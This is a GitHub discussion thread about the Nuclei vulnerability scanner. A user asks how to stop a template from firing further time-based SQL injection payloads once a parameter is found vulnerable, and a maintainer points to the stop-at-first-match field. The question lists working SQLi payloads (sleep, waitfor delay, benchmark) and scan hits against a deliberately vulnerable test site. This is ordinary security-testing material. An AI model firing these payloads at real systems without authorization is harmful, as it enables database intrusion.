### DISCUSSION TITLE
Efficient Scanning: Stopping Tests on Vulnerable Parameters to Avoid Duplicates

### DISCUSSION THREAD

**Discussion by skalvin** [projectdiscovery/nuclei#4216] [Q&A] [answered]
I'm seeking a solution to enhance my Nuclei template for SQL injection testing. Currently, all payloads are executed and printed in results, even after detecting a vulnerable parameter. I want to modify the template to stop testing a parameter once it's found vulnerable and seamlessly move on to the next, making the scan more efficient and focused."

    payloads:
      injection:
      - "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z"
      - "sleep(5)#"
      - "1 or sleep(5)#"
      - "(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--"
      - "'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z"
      - "' or sleep(5)='"
      - "SLEEP(5)#"
      - "pg_SLEEP(5)"
      - "waitfor delay '00:00:05'--"
      - "benchmark(50000000,MD5(1))--"

[SQLi-time-based] [http] [high] http://testphp.vulnweb.com/artists.php?artist=' or sleep(5)=
[SQLi-time-based] [http] [high] http://testphp.vulnweb.com/artists.php?artist=SLEEP(5)#
[SQLi-time-based] [http] [high] http://testphp.vulnweb.com/artists.php?artist=(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
[SQLi-time-based] [http] [high] http://testphp.vulnweb.com/artists.php?artist='XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
[SQLi-time-based] [http] [high] http://testphp.vulnweb.com/artists.php?artist=benchmark(50000000,MD5(1))--
it continue.. to test all payloads....

how to solve this issue?

**Comment by MetzinAround** [comment]
This might be something that will be solved in upcoming v3 with JS scripting capabilities. I'm going to bring this to our OSS team to ask them so I can be sure.

**Reply by MetzinAround** [reply]
Also, noticed you named the template SQLi-time-based, and just wanted to mention that time based SQL testing can be tricky since there are a lot of reasons a request might take a certain amount of time. Not to say it can't be done, but it can lead to more false positives.

**Comment by tarunKoyalwar** [comment, marked as answer]
@skalvin nuclei has `stop-at-first-match` field in yaml for this purpose . check this example template => https://templates.nuclei.sh/public/ssrf-via-proxy
